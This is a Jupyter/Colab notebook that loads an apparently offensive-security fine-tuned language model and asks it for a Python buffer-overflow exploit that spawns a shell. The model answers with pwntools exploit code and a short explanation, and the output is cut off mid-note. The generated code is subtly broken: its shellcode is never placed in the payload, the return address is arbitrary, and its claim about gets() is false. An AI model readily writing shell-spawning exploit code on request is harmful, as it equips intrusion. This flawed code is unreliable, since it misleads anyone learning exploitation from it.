<a href="https://colab.research.google.com/github/j0rdan0/AI-notebooks/blob/main/StrikeGPT.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

In [ ]:
#!pip install transformers unsloth

In [ ]:
from unsloth import FastLanguageModel
import torch


max_seq_length = 10*4096 # Choose any! We auto support RoPE Scaling internally!
dtype = None # None for auto detection. Float16 for Tesla T4, V100, Bfloat16 for Ampere+
load_in_4bit = True # Use 4bit quantization to reduce memory usage. Can be False.



🦥 Unsloth: Will patch your computer to enable 2x faster free finetuning.
🦥 Unsloth Zoo will now patch everything to make training faster!


In [ ]:
model, tokenizer = FastLanguageModel.from_pretrained(
    model_name = "Bouquets/StrikeGPT-R1-Zero-8B",
    max_seq_length = max_seq_length,
    dtype = dtype,
    load_in_4bit = load_in_4bit,
    # token = "hf_...",
)
FastLanguageModel.for_inference(model) # Enable native 2x faster inference

==((====))==  Unsloth 2025.7.3: Fast Qwen3 patching. Transformers: 4.53.1.
   \\   /|    Tesla T4. Num GPUs = 1. Max memory: 14.741 GB. Platform: Linux.
O^O/ \_/ \    Torch: 2.7.1+cu126. CUDA: 7.5. CUDA Toolkit: 12.6. Triton: 3.3.1
\        /    Bfloat16 = FALSE. FA [Xformers = 0.0.31.post1. FA2 = False]
 "-____-"     Free license: http://github.com/unslothai/unsloth
Unsloth: Fast downloading is enabled - ignore downloading bars which are red colored!


model.safetensors.index.json: 0.00B [00:00, ?B/s]

model-00001-of-00004.safetensors:   0%|          | 0.00/4.90G [00:00<?, ?B/s]

model-00002-of-00004.safetensors:   0%|          | 0.00/4.92G [00:00<?, ?B/s]

model-00003-of-00004.safetensors:   0%|          | 0.00/4.98G [00:00<?, ?B/s]

...

merges.txt: 0.00B [00:00, ?B/s]

added_tokens.json:   0%|          | 0.00/707 [00:00<?, ?B/s]

special_tokens_map.json:   0%|          | 0.00/613 [00:00<?, ?B/s]

tokenizer.json:   0%|          | 0.00/11.4M [00:00<?, ?B/s]

Qwen3ForCausalLM(
  (model): Qwen3Model(
    (embed_tokens): Embedding(151936, 4096, padding_idx=151643)
    (layers): ModuleList(
      (0-35): 36 x Qwen3DecoderLayer(
        (self_attn): Qwen3Attention(
          (q_proj): Linear4bit(in_features=4096, out_features=4096, bias=False)
          (k_proj): Linear4bit(in_features=4096, out_features=1024, bias=False)
          (v_proj): Linear4bit(in_features=4096, out_features=1024, bias=False)
          (o_proj): Linear4bit(in_features=4096, out_features=4096, bias=False)
          (q_norm): Qwen3RMSNorm((128,), eps=1e-06)
          (k_norm): Qwen3RMSNorm((128,), eps=1e-06)
          (rotary_emb): LlamaRotaryEmbedding()
        )
        (mlp): Qwen3MLP(
          (gate_proj): Linear4bit(in_features=4096, out_features=12288, bias=False)
          (up_proj): Linear4bit(in_features=4096, out_features=12288, bias=False)
          (down_proj): Linear4bit(in_features=12288, out_features=4096, bias=False)
          (act_fn): SiLU()
        )
 

In [ ]:
instruction = "write a simple exploit for buffer overflow to get a shell.Give me the exploit code in python"
input_text = 'the source code of the binary to exploit \
 #include <stdio.h>\
int main(int argc, char **argv) { \
  char buf[8];         // buffer for eight characters \
  gets(buf);           // read from stdio (sensitive function!) \
  printf("%s\n", buf); // print out data stored in buf \
  return 0;            // 0 as return value \
} '

In [ ]:
alpaca_prompt = """Below is an instruction that describes a task, paired with an input that provides further context. Write a response that appropriately completes the request.

### Instruction:
{}

### Input:
{}

### Response:
{}"""

In [ ]:

inputs = tokenizer(
[
    alpaca_prompt.format(
        instruction, # instruction
        input_text, # input
        "", # output - leave this blank for generation!
    )
], return_tensors = "pt").to("cuda")

In [ ]:
from transformers import TextStreamer
text_streamer = TextStreamer(tokenizer, skip_prompt = True)
_ = model.generate(**inputs,streamer = text_streamer, max_new_tokens = 8192, pad_token_id = tokenizer.eos_token_id)


Here's a simple buffer overflow exploit code in Python to get a shell:

```python
import sys
from pwn import *

context(arch='i386', os='linux')

# Buffer size is 8 bytes, but we need to overflow the stack to execute shellcode
shellcode = asm(shellcraft.sh())

# Create payload with padding to reach EIP coverage
payload = b'A' * 8  # Fill the 8-byte buffer
payload += p32(0x400000)  # Padding to reach EIP

# Connect to the vulnerable program
conn = remote('target_ip', 1337)

# Send payload to trigger overflow
conn.sendlineafter(b'Enter input:', payload)

# Get shell
conn.interactive()
```

Key points:
1. The vulnerable program uses `gets()` which writes up to 4095 bytes to a 8-byte buffer
2. The payload starts with 8 'A' characters to fill the buffer
3. We pad until we reach the instruction pointer (EIP) to control execution flow
4. `shellcraft.sh()` generates shellcode to execute a shell
5. We connect to the vulnerable service and send the crafted payload

Note: Before execution, make s